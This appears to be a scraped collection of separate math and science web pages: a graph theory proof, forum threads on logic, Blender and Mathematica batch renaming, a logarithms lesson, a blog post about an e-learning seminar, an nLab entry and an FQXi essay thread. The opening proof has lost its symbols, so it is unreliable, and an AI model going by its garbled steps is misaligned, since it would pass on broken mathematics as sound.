First suppose that has a vertex cover with . We show that there exists a substructure cut of with . For any vertex , let . Then consists of a spanning subgraph of with center vertex . Let . Clearly, and . Thus, is disconnected with independent cliques , indicating that is a -substructure-cut of size at most . So .
Next suppose that is a -substructure-cut of with . We show that has a vertex cover of size at most .
Since each element of is a subgraph of , we focus on the center vertex of for (since each center vertex of covers all its neighbors). Let be the set of center vertices of , , and let . Thus, two cases arise.
Case 1. . Then there are vertices of that are adjacent to the vertices of not covered by . Since each vertex of is adjacent exactly one vertex in , the number of vertices of not covered by is not greater than the number of vertices in . Therefore, there exists a vertex cover of of size at most .
Case 2. . Then . Since there are disjoint cliques of size in , each () with center vertices in could subvert at most vertices in each . Thus, the remaining subgraph of consists of at least two cliques of size at least and the vertices in separate cliques are not adjacent. It implies that is connected and not a complete graph, which is a contradiction.
This completes the proof. ∎
Remark. The authors of [2] constructed a graph similar to the one in Theorem 2 to prove NP-completeness of neighbor connectivity by reducing from the dominating set problem, while we show NP-completeness of the substructure connectivity by reducing from the vertex cover problem.
## References
• [1] J.A. Bondy, U.S.R. Murty, Graph theory, Springer, New York, 2007.
• [2] L.L. Doty, R.J. Goldstone, C.L. Suffel, Cayley graphs with neighbor connectivity one, SIAM J. Discrete Math. 9 (1996) 625–642.
• [3] M.E. Dyer, A.M. Frieze, On the complexity of partitioning graphs into connected subgraphs, Discrete Appl. Math. 10 (1985) 139–153.
• [4] M.E. Dyer, A.M. Frieze, Planar 3DM is NP-complete, J. Algor. 7(2) (1986) 174–184.
• [5] P. Hall, On representatives of subsets, J. Lond. Math. Soc. 10 (1935) 26–30.
• [6] R.M. Karp, Reducibility among combinatorial problems, In: R.E. Miller, J.W. Thatcher, J.D. Bohlinger (eds) Complexity of Computer Computations, The IBM Research Symposia Series, Springer, Boston, MA, 1972.
• [7] Y. Lei, J. Meng, Structure fault-tolerance of arrangement graphs, Appl. Math. Comput. 381 (2020) 125287.
• [8] X. Li, S. Zhou, X. Ren, X. Guo, Structure and substructure connectivity of alternating group graphs, Appl. Math. Comput. 391 (2021) 125639.
• [9] C.-K. Lin, L. Zhang, J. Fan, D. Wang, Structure connectivity and substructure connectivity of hypercubes, Theor. Comput. Sci. 634 (2016) 97–107.
• [10] H. Lü, T. Wu, Structure and substructure connectivity of balanced hypercubes, Bull. Malays. Math. Sci. Soc. 43 (2020) 2659–2672.
• [11] Yali Lv, J. Fan, D.F. Hsu, C.-K. Lin, Structure connectivity and substructure connectivity of $k$-ary $n$-cube networks, Inform. Sci. 433–434 (2018) 115–124.
• [12] E. Sabir, J. Meng, Structure fault tolerance of hypercubes and folded hypercubes, Theor. Comput. Sci. 711 (2018) 44–55.
https://www.physicsforums.com/threads/a-type-of-reasoning.982901/ | # A type of reasoning
• B
## Main Question or Discussion Point
I am reading a pdf where, under a "classic ways of reasoning" section, the author introduced a method called la disjonction de cas, which I think in English would be "case by case" reasoning. He enounced it as follows:
$$\text{Let }\mathrm A,\,\mathrm B\text{ and }\mathrm C\text{ be three propositions, then:}\\ \text{This implication is always true: } ((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))\Rightarrow((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)$$
I am not sure I understand the point of this, here's how I am thinking about it:
If I can show that ##((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))## is true, then I have proved that ##((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)## is true. I know nothing about the truth value of ##\mathrm C##, so I should prove that both ##\mathrm A## and ##\mathrm B## are true to force the truthfulness of the proposition on the left side of the main implication and thus that on the right.
I feel that I am missing something, though, or that I am not seeing the main point. If you could evaluate my reasoning, and/or add something more, I'd be grateful.
EDIT: I should prove that the implications on both sides of the conjunction are true not ##\mathrm A## and ##\mathrm B##, since showing the latter propositions to be doesn't imply that the right side of the main implication is true as ##\mathrm C## might not follow.
Mark44
Mentor
I am reading a pdf where, under a "classic ways of reasoning" section, the author introduced a method called la disjonction de cas, which I think in English would be "case by case" reasoning. He enounced it as follows:
$$\text{Let }\mathrm A,\,\mathrm B\text{ and }\mathrm C\text{ be three propositions, then:}\\ \text{This implication is always true: } ((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))\Rightarrow((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)$$
I am not sure I understand the point of this, here's how I am thinking about it:
If I can show that ##((\mathrm A\Rightarrow\mathrm C)\wedge(\mathrm B\Rightarrow\mathrm C))## is true, then I have proved that ##((\mathrm A \vee \mathrm B)\Rightarrow\mathrm C)## is true.
No, that's not how it works. If you are trying to prove the overall implication, you would need to also show that ##(A \vee B) \Rightarrow C## is true.
archaic said:
I know nothing about the truth value of ##\mathrm C##, so I should prove that both ##\mathrm A## and ##\mathrm B## are true to force the truthfulness of the proposition on the left side of the main implication and thus that on the right.
I feel that I am missing something, though, or that I am not seeing the main point. If you could evaluate my reasoning, and/or add something more, I'd be grateful.
EDIT: I should prove that the implications on both sides of the conjunction are true not ##\mathrm A## and ##\mathrm B##, since showing the latter propositions to be doesn't imply that the right side of the main implication is true as ##\mathrm C## might not follow.
One way to establish the overall implication is to use a truth table. From my work, it looks like the overall implication actually goes both ways.
What the implication is saying is that if A implies C and B implies C, then either A or B implies C.
Here's a simple example of the implication being used.
Define A as the statement ##x = 1##.
Define B as the statement ##x = -1##.
Define C as the statement ##x^2 = 1##.
Clearly ##A \Rightarrow C##, and ##B \Rightarrow C##, so ##(A \Rightarrow C) \wedge (B \Rightarrow C)##
Then, if either x = 1 or x = -1, then ##x^2## will be 1. In symbols, ##(A \vee B) \Rightarrow C##.
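A brute-force check of the tautology over all eight truth assignments (an added sketch, not part of the thread; implication is encoded as (not p) or q):

```python
from itertools import product

def implies(p: bool, q: bool) -> bool:
    # p => q is false only when p is true and q is false
    return (not p) or q

ok = all(
    implies(implies(a, c) and implies(b, c), implies(a or b, c))
    for a, b, c in product([False, True], repeat=3)
)
print(ok)  # True: the overall implication holds for every assignment of A, B, C
```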
No, that's not how it works. If you are trying to prove the overall implication, you would need to also show that ##(A \vee B) \Rightarrow C## is true.
But the overall implication is always true! If ##\mathrm P\Rightarrow\mathrm Q## is true, then if I show that ##\mathrm P## is true, it follows that ##\mathrm Q## is true using the truth table of the implication (keeping in mind that implication is true).
Mark44
Mentor
But the overall implication is always true! If ##\mathrm P\Rightarrow\mathrm Q## is true, then if I show that ##\mathrm P## is true, it follows that ##\mathrm Q## is true using the truth table of the implication (keeping in mind that implication is true).
It's not clear to me what you're trying to do. If you are merely using the implication, then yes, if P is true, Q must also be true. OTOH, if you are trying to prove the implication, you must show that when P is true, it necessarily follows that Q will be true. Note that for an implication ##P \Rightarrow Q##, the only situation in which the implication is false is when P is true but Q is false. All other combinations of truth values result in a true implication.
https://www.techtud.com/chapter/12161/12184/23675 | ##### Example 4c Sheldon Ross
Consider a set of n antennas of which m are defective and n − m are functional and assume that all of the defectives and all of the functionals are considered indistinguishable. How many linear orderings are there in which no two defectives are consecutive?
Now, if no two defectives are to be consecutive, then the spaces between the functional antennas must each contain at most one defective antenna. That is, in the n − m + 1 possible positions—represented in Figure 1.1 by carets—between the n − m functional antennas, we must select m of these in which to put the defective antennas. Hence, there are ${n - m + 1 \choose m}$ possible orderings in which there is at least one functional antenna between any two defective ones.
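A quick brute-force sanity check of this count (an added sketch, not from the book): enumerate all placements of m indistinguishable defectives among n positions, keep those with no two adjacent, and compare with ${n - m + 1 \choose m}$:

```python
from itertools import combinations
from math import comb

def count_no_adjacent(n: int, m: int) -> int:
    """Orderings of m indistinguishable defectives among n antennas with no two adjacent."""
    total = 0
    for positions in combinations(range(n), m):
        if all(b - a > 1 for a, b in zip(positions, positions[1:])):
            total += 1
    return total

for n, m in [(5, 2), (8, 3), (10, 4)]:
    print(n, m, count_no_adjacent(n, m), comb(n - m + 1, m))
# The brute-force count and the binomial formula agree in every case.
```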
https://blender.stackexchange.com/questions/136455/how-to-get-posebone-global-rotate | # How to get posebone global rotate [duplicate]
A bone was rotated 90 degrees on the Y axis.
I simply want to get (0, 90, 0), but in Blender it is represented by Euler angles (86.4, 44.9, 66.3).
How do I get the rotation on the global axis in Python code?
import bpy
obj = bpy.data.objects["Armature"]
for pbone in obj.pose.bones:
rotate_x = pbone.rotation_euler.x ##1.5072393417358398 (Euler)
rotate_y = pbone.rotation_euler.y ##0.7828118801116943 (Euler)
rotate_z = pbone.rotation_euler.z ##1.1571569442749023 (Euler)
'''
rotate_x _y _z are all euler angles of Bone.
But I want to get these as below.
It will be
rotate_x = 0
rotate_y = 1.5708(or 90)
rotate_z = 0
because rotate 90 degrees on Axis Y.
'''
• Possibly, Blender's bone may not be able to obtain the rotation angle on the global axis. I searched for a reference, but there was no code that could get the rotation angle on the global axis anywhere. – PERIPERI Apr 8 '19 at 3:20
• For example, suppose you rotate 90 degrees on the global Y axis. (0, 90, 0) is the desired value. However, Blender always refers to the local rotation angle. Even if it rotates on the global axis, the value of the rotation angle is displayed as rotation on the local axis. – PERIPERI Apr 8 '19 at 3:26
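One possible approach (a sketch, not an answer taken from the page; it assumes Blender 2.80+, where matrix multiplication uses the @ operator): compare the bone's posed world-space matrix with its rest-pose world-space matrix and read the difference as a rotation about the global axes.

```python
import bpy
from math import degrees

obj = bpy.data.objects["Armature"]

for pbone in obj.pose.bones:
    # Posed matrix of the bone, converted from armature-object space to world space
    posed_world = obj.matrix_world @ pbone.matrix
    # Rest-pose matrix of the underlying bone, also in world space
    rest_world = obj.matrix_world @ pbone.bone.matrix_local
    # Rotation applied on top of the rest pose, expressed about the global axes
    delta = posed_world @ rest_world.inverted()
    rot = delta.to_euler()
    print(pbone.name, [round(degrees(a), 1) for a in rot])
    # A bone rotated 90 degrees about global Y should print approximately [0.0, 90.0, 0.0]
```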
https://brilliant.org/problems/coffee-cup-finance/ | # Coffee cup finance
Calculus Level 2
To use a coffee machine, you fill a drinking cup with water, pour the water into the reservoir, and then put your cup under the spout. Once the water is heated, it flows through coffee grounds and into your cup. Once you use a cup to drink, it is coated with sugar, coffee, and other residues that would ruin the internal workings of the coffee machine, so you cannot reuse the cup.
If instead, you use two cups, one that you always use to fill the coffee machine with water, and a second that you always use to collect the coffee, you can limit the number of coffee cups you have to use in total to two.
Question: Which of the following functions describes your fractional savings in the total number of coffee cups you've had to use as a function of $c$, the number of cups of coffee you've made?
http://greenemath.com/Algebra%20II/70/LogarithmicFunctionsPracticeSet.html | # In this Section:
In this section, we will learn about logarithmic functions. In a previous lesson, we learned about exponential functions such as: f(x) = a^x. When we take the inverse of this function, we end up with: x = a^y. Up to this point, we have not learned any method that would allow us to solve for the dependent variable y. Logarithms provide a way to perform this operation. We can say that: y = log_a(x) is the same as: x = a^y. So for all intents and purposes, a logarithm is an exponent. When we see log_a(x), we are asking for the exponent to which the base (a) must be raised to obtain (x). As an example, suppose we see: log_2(8). We are asking to what exponent the base (2) must be raised in order to obtain 8. The answer is 3, since 2^3 = 8: log_2(8) = 3. We will begin by learning how to convert between exponential and logarithmic form. The process is fairly simple; we just need to understand what is being isolated in each scenario. In exponential form: 3^2 = 9, here 9, the power, is isolated. In logarithmic form, we have: log_3(9) = 2, here 2, the exponent, is isolated. We will then move into solving logarithmic equations. We solve these equations by converting into exponential form and solving the resulting equation. Lastly, we will look at how to sketch the graph of a logarithmic function.
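A quick numerical check of these conversions — a small Python sketch added for illustration, not part of the original lesson:

```python
import math

# log_2(8) asks: to what exponent must the base 2 be raised to obtain 8?
print(math.log2(8))          # 3.0, since 2**3 == 8

# Converting log_3(9) = 2 back to exponential form: 3**2 == 9.
print(3 ** 2 == 9)           # True

# Solving a logarithmic equation such as log_5(x) = 3 by converting
# to exponential form: x = 5**3.
x = 5 ** 3
print(x, math.isclose(math.log(x, 5), 3.0))   # 125 True
```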
http://www.randform.org/blog/?p=1742 | ## Ikarus
In this post a class/seminar about collaborative e-learning, in which I took part in 2004, was mentioned. The seminar was called “Ikarus”. I just noticed that the seminar, which had been made accessible online in an anonymized fashion, was taken offline recently (somewhat justifying the name Ikarus). Since I found no documentation about the seminar, I would like to use this post to document a bit of what this seminar was about, because I think it was a truly innovative occasion.
First I like to explain a bit about my personal motivation for taking part in the seminar. I feel a bit pressured to justify what this seminar had to do with math/physics (and also with art/design):
### personal motivation
As one can see at the daytar exhibition, the issue of communication via virtual means is a central topic of our media experiments – especially in the aspects which are related to math/physics. The seminar was one occasion to learn more about this issue in general.
It is an issue about which I have thought for a long time. In 1987, for example, I wrote about future possibilities in scientific visualization, with a part on interactive math, as part of a class assignment in computer graphics at MIT's Media Lab. (Unfortunately I loaned out my only copy of the report to someone in Berlin who threw it away accidentally, and I doubt that the Media Lab professor of that class kept a copy:))
The emphasis of the Ikarus seminar on the collaborative aspect was of particular interest for me, since I hoped to learn more about the crucial inputs for online collaboration. Admittedly, the motivation was fueled by a more or less failed attempt to encourage an online discussion (in the hope of collaboration) on the mailing list of the European Women in Mathematics (EWM).
What happened with the EWM mailing list? Before 1998/99 the EWM mailing list was usually used for job and conference announcements and a little bit for discussions about issues concerning women mathematicians. However, due to the war in former Yugoslavia the discussions suddenly became very political and heated. Quite a few women therefore wanted to be taken off the list, because they didn't want to be involved in these discussions.
Some people proposed forbidding the discussions, in order to avoid the network being destroyed. I found this idea not so good, since I think that especially in wartime one has to discuss, and so I proposed to introduce two lists instead of one: one list including all participants, which distributes the announcements, i.e. an “ewm-announce” list, and a second list, a sublist called “ewm-discuss” contained in ewm-announce, where people can additionally discuss and whose participation is optional. After a discussion the two lists were established in 1999 via the JISC mailing network, and they still exist; however, there is not much discussion going on in ewm-discuss. So my contribution didn't really further collaboration, although it enabled it in principle.
Hence for the Ikarus seminar I hoped to learn more about how to FURTHER online collaboration (rather than e-learning in the classical sense), and indeed – the Ikarus class spurred my thoughts about this more than I thought it would. Last but not least it helped me to set up a Moodle environment, including a library, fora, wiki, chatrooms etc., as an environment for string theorists to discuss scientific issues. I was not fully content with Moodle – in particular the structuring of groups was a bit unfortunate – however it was, in my opinion, the best open source environment around at that time. Unfortunately the attempt to set up a collaboration for the string theorists also sort of failed, in that the involved scientists were not interested in using it:)
In addition, in 2004 I asked the head of the mathematical Oberwolfach Institute, Prof. Greuel, whether Oberwolfach wouldn't be interested in setting up an Internet platform network for scientists in order to allow post-collaboration on mathematical issues (as a kind of extended online seminar). However, Oberwolfach was not interested.
Nevertheless the idea of a collaborative online platform/network for scientists has haunted me ever since. And in fact Tim and I tried to think about how to improve tools for such a task; for example, in this post our (very slowly) ongoing project witgiz/jsymbol was already mentioned (the project was actually summarized in a proposal which was submitted to the first issue of vectors, called evidence, in 2005 (but not accepted:)). Moreover, the paper focuses on the (3D) visual aspects; however, the extension to other organoleptic accesses (please look at the images of a talk in Tokyo in 2003 about this issue) is straightforward. It is clear that the technical design and resources of a collaboration platform are important. In particular, more or less self-organized growing social networks, like facebook or e.g. the nature network, will always be of a different type than a network which comes from a given long-established structure, like global academia.
As a matter of fact the modern scientist has to compete with his/her knowledge against a market of brain-occupying, psychologically grounded instruments, so I became a bit more interested in marketing, psychology and similar measures. For instance, in this post I wrote about the scientific method and marketing, or here about semiotics and marketing. In general, art and design, which are – among other things – concerned with the psychological and perceptional subtleties of representation, are a very important resource for exploring these issues; they are in particular important for visualization. Likewise, serious games belong in this category, and thus among other things we tried to gain some competence with games, and so on.
The communication of mathematical content by means other than the “traditional” ones, made accessible by the development of computers, will in my eyes transform quite a bit the way mathematics and physics are perceived and transmitted – and it has already done so in some branches and in education (last but not least through the kind of products kids have to deal with nowadays).
Finally, all these thoughts on online collaboration and communication, but also my personal opinion that scientists shouldn't stay out of societal discussions, made me write the proposal for a collaborative global network.
What do I mean by societal discussion? Let me illustrate this with a short example:
Before I studied physics I did an internship at the Max-Planck-Institute for Biochemistry in Munich. It was the time of the 1980s nuclear arms race. I asked the Max-Planck officials whether it would be possible to set up a bookshelf in the library of the Institute on which people could leave political information, like leaflets etc. In the end I discussed this issue with the head of the Max-Planck-Institute, Prof. Hofschneider. He was against it, fearing that the scientists might feel politically indoctrinated.
My opinion was that, first, scientists should be professional enough to be able to abstract from indoctrination and, secondly, that everybody could place information on the shelf, allowing for enough diversity. I am still indebted to Prof. Hofschneider for devoting his whole lunch break to this issue and trying to make me understand. In the end we agreed that it is right that scientists SHOULD be professional enough to make the divide between personal opinions and science, but that in practice this OFTEN ENOUGH DOESN'T WORK OUT.
Last but not least this is also one reason why I emphasized in the proposal about the global science platform that the questions to be treated should be of a scientific nature. And if there are questions of morals and ethics, then these should be reflected upon as broadly and scientifically as possible.
But now let's get to the
### content of the Ikarus online seminar:
Warning: what I write now is what I remember of the seminar, so there might be some flaws in the documentation.
The Ikarus online seminar was organized by three European universities: a Spanish one, one I forgot, and the University of Saarbrücken, which was the main organizer. Participation was free and possible worldwide, so participants came from everywhere in the world. I think a bachelor's degree and fluent English were required for participation. Moreover, students interested in the seminar had to pass a little entry exam.
The seminar was divided into three partitions: one partition studied the social aspects, one the legal aspects, and one the technical aspects of collaborative online e-learning. The goal of the class was to gather material about collaborative e-learning itself and, in the end, to design a mini-course about collaborative e-learning. I chose to take part in the technical part of the class.
In the end the three partitions were merged.
The platform itself was based on Moodle. It contained several fora, libraries and a chatroom. Participants were also able to communicate via email.
The seminar worked in the following way: students had to study certain e-learning issues; in the technical part this meant, e.g., comparing different existing virtual learning environments and learning about technicalities such as authentication and authorization, but also about rather “soft-skill topics” like the various learning types. General agreements on the collaborative process were also part of the discussion, like the always problematic trade-off between redundancy and brevity, or the question whether to filter key features or to assemble them.
This “soft skill part” was important since e.g. the technical tools for online collaboration are not always appropriate for all thinking types and it is hard to find adaptive measures.
There was a moderated online discussion on these topics and the contributions were graded. There was a multiple-choice quiz on the to-be-gathered knowledge concerning the respective learning parts.
After the discussions (one for each topic) students were obliged to write summaries/little papers about the learned content in relation to the previous discussion and based on their professional background. These summaries were intended to provide the “course content”. This methodology is, by the way, similar to the first part of the “scientific method”, in that it gathers material in order to justify a hypothesis on an online learning paradigm.
After each summary round it was decided whose summary was best suited to serve as a guideline for an online course on collaborative online learning.
In the end it turned out that there was quite an overlap between the respective partitions; questions like that of authentication had of course also been discussed by the legal partition, tools like mind maps etc. were likewise discussed in the technical as well as in the social part, and so on – and it was interesting to compare the different approaches.
Besides the content part of the seminar, the social aspects of online collaboration were – at least for me – interesting. In particular, I found the communication extremely polite. There was no sign of flame wars or any other kind of disrespectful behaviour. This may have been due to the moderators, who guided each discussion, but it may also have been due to the fact that the real-life identity of each participant was known to the organizers and that the participants were rather well educated. In the chat room and the “cafe-like” fora, cultural and interpersonal topics could be discussed, which helped to promote collaboration. The time delay of presentations on the fora helped people to focus on the essentials and to control their temper.
It is a pity that the seminars are currently not taking place anymore and that the anonymized course is not accessible at the moment.
### General remarks about online collaboration/conclusion:
I wrote here about several failed attempts to set up an online collaboration.
This is maybe not the best thing to do in order to market a global electronic platform/semantically connected network. However, one should be honest. It IS difficult to get such a thing working.
Moreover, I learned from these failed attempts. In particular, it is crucial that the involved scientists are fairly well motivated to work on a question. This depends to a great extent on the content of the questions themselves. In the example of climate change and the IPCC report, for instance, it was clear to all involved scientists that this is an important question to work on, and thus they were motivated enough to go to Paris and write reports.
I.e.
#### an interesting problem is a source of motivation to collaborate.
Likewise, this was also the reason why the above-mentioned online string seminar didn't work out; in other words, there was no central set of questions that everybody would identify with in order to overcome the obstacles of logging in, getting a password and dealing with time-delayed communication. This also explains why people would heatedly discuss the war on the EWM email network despite the anonymity of an email list – a war is certainly a method of overcoming passiveness, albeit an ugly one.
Michael Nielsen lists two other sources of how to set up a good collaboration namely:
#### Collaboration should recognize individual effort appropriately
In the Ikarus seminar this was partially done by the grading, partially by the participants congratulating each other, which I think is important if it is meant sincerely and is not fake.
It was by the way used in the German Democratic Republic as a major source of motivation:
“§ 9. The state and economic functionaries are responsible for remunerating and rewarding the achievements of the working youth in accordance with the socialist performance principle, and for giving them moral recognition in many and varied ways. They ensure that wages and bonuses give the working youth an interest in achieving high work performance, taking on greater responsibility and acquiring the necessary qualifications.” (Translated from http://www.verfassungen.de/de/ddr/jugendgesetz74.htm, “Die Förderung der Initiative der werktätigen Jugend” – the promotion of the initiative of the working youth)
I personally think that recognition by people one personally respects and holds in high esteem is probably one of the strongest sources of motivation (especially for collaboration), much stronger than money and power. Money is only really important as long as the basic needs (food, housing, information) are not decently satisfied. Power suggests that there is a lot of recognition; however, this is usually only half true.
Besides the already mentioned mere interest in a certain matter or mere hunger etc. (for more see http://en.wikipedia.org/wiki/Motivation), the so-called personal belief in “a cause” might be another (often doubtful) source.
The above also shows a bit how much damage can be done if these mechanisms are abused. In the GDR this was unfortunately often the case.
#### Collaboration should involve people with complementary skills
Due to the internationality of the string workshop and the EWM network, the lack of complementary skills was not really the reason for failure. On the contrary, the interests were rather too complimentary. If the interests are too complimentary, one needs a great deal of social binding instruments, like e.g. singing together etc. So why not establish an online platform chorus?
### 4 Responses to “Ikarus”
1. O. Condor Says:
On the contrary the interests were rather too complimentary.
What do you mean by “too complimentary” ? Do you really think an online chorus helps to resolve problems in string theory?
2. bembo Says:
@operation condor
+1
What do you mean by “too complimentary” ? Do you really think an online chorus helps to resolve problems in string theory?
With “too complimentary” I mean what I described above: “there was no central set of questions that everybody would identify with in order to overcome the obstacles of logging in, getting a password and dealing with time-delayed communication.” That is, string theory is a rather big terrain given the necessary detail; it comprises a lot of different mathematical models. So I got the impression at the workshop that people were working on rather different models in sufficient detail, and so it was difficult to find something to work on together; things appeared too far apart for a lot of people. But maybe I am wrong – that is, I am no string theorist and I have and had giant difficulties understanding the string theory jargon. I don't know, however, how problematic this “jargonization” is among string theorists.
The online chorus comment was more tongue-in-cheek. I do think that a good working atmosphere is important, and in principle social bonds might eventually help to provide the extra energy to keep things together and further the research, but then this might also increase group stress. Finally, the social rituals in some choirs are rather off-putting.
In general I think what's more problematic is that, apart from maybe their family, researchers usually have all their “social life” within the work community, often simply because the job is so time-demanding. When I no longer had an academic job, almost all the job acquaintances with whom one would previously hang out – poof – vanished rather instantly.
Here is a chart of how social life looks in the US, but I think this is probably similar in all “developed” countries.
4. O. Condor Says:
When I no longer had an academic job, almost all the job acquaintances with whom one would previously hang out – poof – vanished rather instantly.
Well, a job is not meant for enhancing your “social life.” Networking is important for your business (even for the research “business”) and you shouldn't confuse networking with relaxation.
Anyways, I now understand what you mean by “too complimentary”, i.e. you mean no overlap, which always includes a little redundancy. I have doubts, though, that things were like that. I don't know whether you have heard of M-theory, which provides a connection between parts that at first sight seem disconnected.
I am sure the participants were aware of those connections and it was just you as a newcomer who perceived this differently.
But maybe I am wrong – that is, I am no string theorist and I have and had giant difficulties understanding the string theory jargon.
Considering your communication problems – I think a problem could have been that the knowledge gap was too big. Think about how much your contributions (may have) helped (if there were any at all) and vice versa. May I ask why you attended this conference?
Comments in German, French and Russian will be translated into English.
You can use LaTeX in your math comments by using the shortcode: [latex]E = m c^2[/latex]
https://ncatlab.org/nlab/show/(n%20%C3%97%20k)-category | # nLab (n × k)-category
## Idea
An $(n \times k)$-category (read “n-by-k category”) is an n-category internal to a $k$-category. The term is “generic” in that it does not specify the level of strictness of the $n$-category and the $k$-category.
For example:
• A $(1 \times 0)$-category, as well as a $(0 \times 1)$-category, is precisely a category. More generally, $(n\times 0)$-categories and $(0\times n)$-categories are precisely $n$-categories.
• A $(1 \times 1)$-category is precisely a double category (either strict or weak).
• Generalizing to a 3rd axis, a $(1 \times 1 \times 1)$-category is precisely a triple category, that is, a category internal to (categories internal to categories), i.e. a category internal to double categories, or a double category internal to categories — which again could be strict or weak.
• An $(n \times 1)$-category is what Batanin calls a monoidal n-globular category.
An $(n \times k)$-category has $(n + 1)(k + 1)$ kinds of cells.
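For example (a standard illustration rather than a claim from this entry): taking $n = k = 1$ gives $(1+1)(1+1) = 4$ kinds of cells, which for a double category are the objects, the horizontal morphisms, the vertical morphisms, and the squares.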
Under suitable fibrancy conditions, a $(n \times k)$-category will have an underlying $(n + k)$-category (where here, $n + k$ is to be read arithmetically, rather than simply as notation). Fibrant $(1 \times 1)$-categories are known as framed bicategories.
## Examples
• Commutative rings, algebras and modules form a symmetric monoidal $(2 \times 1)$-category.
• Conformal nets form a symmetric monoidal $(2 \times 1)$-category.
## Relationships
At least in some cases, if the structure is sufficiently strict or sufficiently fibrant, we can shift cells from $k$ to $n$. For instance:
• A sufficiently strict $(1 \times 2)$-category canonically gives rise to a $(2 \times 1)$-category. (Cor. 3.11 in DH10)
• Any double category (i.e. a $(1\times 1)$-category) has an underlying 2-category.
• A sufficiently fibrant $(2\times 1)$-category has an underlying tricategory (i.e. $(3\times 0)$-category).
## References
• Mike Shulman, Constructing symmetric monoidal bicategories, arXiv preprint arXiv:1004.0993 (2010)
• Michael Batanin, Monoidal globular categories as a natural environment for the theory of weak $n$-categories, Advances in Mathematics 136 (1998), no. 1, 39–103.
The following paper contains some discussion on the relationship between various (weak) $(n \times k)$-categories for $n, k \leq 3$.
There is some discussion on this n-Category Café post as well as this one.
http://mathematica.stackexchange.com/questions/49226/how-to-output-a-bat-file-and-execute-it | # How to output a bat file and execute it?
I tried to write a bat file to help me rename files. The command to do this in that file is "ren file1 file2", which is equivalent to RenameFile[file1, file2].
renameFiles[directory_, files_, rename_] :=
Module[{list, i = 1, newfiles},
SetDirectory[directory];
newfiles = ("ren " <> #) & /@ FileNames[files];
list = Table[
" " <> rename <> ToString[i] <> ".png", {i, 1, Length[newfiles]}];
While[i <= Length[newfiles],
newfiles[[i]] = newfiles[[i]] <> list[[i]]; i++];
Return[newfiles]
]
renameFiles[] has three arguments, which take the path, the files in that path, and the name I want to change to, respectively, and then converts them into a list of "ren file1 file2" commands. Afterwards, I output it as a txt file. I tried to output it as a bat file, however it displays an error after I do: Export["E:\\Download Pictures\rename.bat", a]
Therefore, I attempt to do that in a different way, which renames "rename.txt" afterwards by doing: RenameFiles["E:\\Download Pictures\rename.txt","E:\\Download Pictures\rename.bat"]
So, now, I have my "rename.bat" file. I try to use SystemOpen["E:\\Download Pictures\rename.bat"] to execute it. However, it cannot work well, and I have to do it by clicking the file.
My questions are: 1. Sometimes I get the syntax: OpenWrite::noopen: "Cannot open \!$$\"E:\\\\Download Pictures\\\\nename.txt\"$$. " , how can I fix this? 2. Is this the only way I can output a bat file. 3. and, how can I execute via MMA.
Thanks a lot!
Not sure why you'd want to go through all the machinations of creating a batch file instead of just doing it directly with RenameFile, but... using your function, e.g.:
rn = renameFiles["c:\\users\\rasher\\documents\\", "*.xxx", "blah"];
Export["c:\\users\\rasher\\documents\\ren.bat", rn, "Text"];
SetDirectory["c:\\users\\rasher\\documents\\"];
Run["ren.bat"]
Will do it.
https://fqxi.org/community/forum/topic/1295 | CATEGORY: Questioning the Foundations Essay Contest (2012)
TOPIC: Why We Still Don’t Have Quantum Nucleodynamics by Norman D. Cook
Author Norman D. Cook wrote on Jun. 25, 2012 @ 15:58 GMT
Essay Abstract
Quantum electrodynamics (QED) is called the "jewel of atomic theory" because it allows for quantitative predictions of a huge number of atomic states using quantum mechanics. Although the QED techniques were adapted to the problems of nuclear theory in the 1950s, they did not lead to a rigorous quantum nucleodynamics (QND). The core problem has been the assumption of a central nuclear potential-well to bind nucleons together, in analogy with the Coulomb force that binds electrons to the nucleus. By replacing that fictitious long-range nuclear potential-well with the experimentally-known, short-range nuclear force, QND becomes possible.
Author Bio
Undergraduate at Princeton University (Princeton, USA), graduate student at Tohoku University (Sendai, Japan) and Oxford University (Oxford, UK), post-doctoral research at Zurich University (Zurich, Switzerland), invited researcher at ATR (Kyoto, Japan), full professor at Department of Informatics, Kansai University (Osaka, Japan). Seventy-plus articles published in refereed science journals, four scientific monographs, most recently, Models of the Atomic Nucleus (Springer, 2010).
Lawrence B. Crowell wrote on Jun. 28, 2012 @ 17:04 GMT
Your paper is pretty interesting, though rather removed from my experience beyond an undergraduate elective course in nuclear physics. At the risk of showing how ignorant I am of nuclear physics, or what might be called classical or pre-QCD nuclear physics, I am going to bounce an idea here. It seems to me that the LDM and the IPM might represent different phases of a nucleus. The two approaches seem to reflect different scales with which the isospin nuclear force acts.
Some years ago emergent supersymmetry was discovered in the physics of the nucleus. It has been my speculation there is some sort of phase transition in the nucleus. This phase transition might be similar to BCS superconductivity, but with a twist. The conductivity of a medium is
σ(ω) = j(ω)/E(ω).
The conductivity σ(ω) = Re[σ(ω)] + i Im[σ(ω)]; for BCS superconductivity, Re[σ(ω)] determines how well a superconductor absorbs photons of frequency ω. For ω > ω_c = 2Δ the photon can demolish a Cooper pair into two uncorrelated electrons. The critical frequency, or Δ, is determined by a Bogoliubov coefficient. This connects with a phase structure for black holes, or for collective systems that have properties analogous to black holes. A photon entering a black hole is related to a photon exiting the black hole by Bogoliubov coefficients. The black hole may possess a charge, or BPS gauge index, and the incoming photon will interact with the charges on the stretched horizon. For ω > ω_c the photon penetrates the stretched horizon with charged fermions in a correlated or Cooper-pair type of state. The wave equation for the vector potential is
(∇^2 - ∂_t^2+ m^2)A^μ = 0,
where the mass is an effective mass m^2 = q|ψ|^2 from the coupling with the fermions ψ. This results in a dispersion relation and a frequency-dependent σ(ω), where for ∇^2A^μ = k^2A^μ, as k → 0 the conductivity is
σ(ω) ~ lim_{z→0} E(ω,z) B(ω,z)
This is analogous to computing the effective impedance of free space on the boundary of an anti-de Sitter spacetime in the AdS/CFT correspondence. The conductivity is independent of the interchange E <--> B, and the conductivity is constant for ω = ω(k) < ω_c. The current is then proportional to the potential: from σ(ω) = j(ω)/E(ω) constant, the current
j(ω,k) = const A(ω,k) ~ const E(ω,k)/ω,
where the current is divergent at ω = 0. This is then a superconducting phase.
